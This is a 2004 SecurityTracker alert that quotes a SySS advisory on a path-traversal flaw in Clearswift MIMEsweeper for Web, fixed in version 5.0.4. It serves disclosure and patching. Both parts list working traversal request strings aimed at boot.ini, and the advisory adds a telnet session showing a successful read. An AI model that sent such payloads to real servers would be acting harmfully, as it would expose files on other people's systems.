Clearswift MIMEsweeper for Web Discloses Files to Remote Users
|
|
SecurityTracker Alert ID: 1010933 |
|
SecurityTracker URL: http://securitytracker.com/id/1010933
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Aug 12 2004
|
Impact:
Disclosure of system information, Disclosure of user information
|
Fix Available: Yes Vendor Confirmed: Yes
|
Version(s): prior to 5.0.4
|
Description:
A vulnerability was reported in Clearswift MIMEsweeper for Web. A remote user can view files on the target system.
Pierre Kroma reported that a remote user can request a specially crafted URL containing directory traversal characters to view files on the target system that are located outside of the web server folder.
Some demonstration exploit requests are provided:
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0
The vendor was notified on August 5, 2004 [but had fixed the flaw in March 2004].
|
Impact:
A remote user can view files on the target system that are located outside of the web folder directory.
|
Solution:
The vendor released a fixed version (5.0.4 or later) in March 2004, available at:
http://www.clearswift.com/support/msw/patch_MswWeb.aspx
|
Vendor URL: www.clearswift.com/products/msw/msw_web/default.aspx (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 11 Aug 2004 17:48:30 +0200
Subject: Clearswift Mimesweeper Path Traversal Vulnerability
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------
SySS-Advisory: Clearswift Mimesweeper Path Traversal Vulnerability
- -------------------------------------------------------------------
Problem discovered: July 27th 2004
Vendor contacted: August 5th 2004
Advisory published: August 11th 2004
AUTHOR: Pierre Kroma (kroma@syss.de)
SySS GmbH
72070 Tuebingen / Germany
Tel.: +49-7071-407856-0
Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC
APPLICATION: Clearswift Mimesweeper
AFFECTED VERSION: all < 5.0.4 (5.0.1 tested)
Remotely Exploitable: Yes
Locally Exploitable: Yes
SEVERITY: Critical
DESCRIPTION:
It is possible to read arbitrary files on
the remote server by prepending /foobar/\../\../
in front on the file name.
EXAMPLE:
telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0
HTTP/1.0 200 Ok
Date: Do, 27 Jul 2004 14:30:07 GMT
Server: Clearswift Web Server
Content-length: 186
Content-type: application/octet-stream
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server"
/fastdetect
Connection closed by foreign host.
Here are some serveral examples:
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0
IMPACT: This vulnerability can be used to retrieve any file from the partion where the clearswift webserver is installed. The number
of "/","\",".." characters will depend on the ServerRoot (location of the virtual / directory) setting.
VENDOR STATUS: Clearswift has fixed the vulnerability in version >= 5.0.4.
-----BEGIN PGP SIGNATURE-----
iD8DBQFBGj/O2OGppPJXTuwRApxvAJ96xep/MUzfKKiAm9MlICe4r+Q0OgCghDOO
sLrOlvzvBPK8xDGB178xQ14=
=qP1W
-----END PGP SIGNATURE-----
|
|
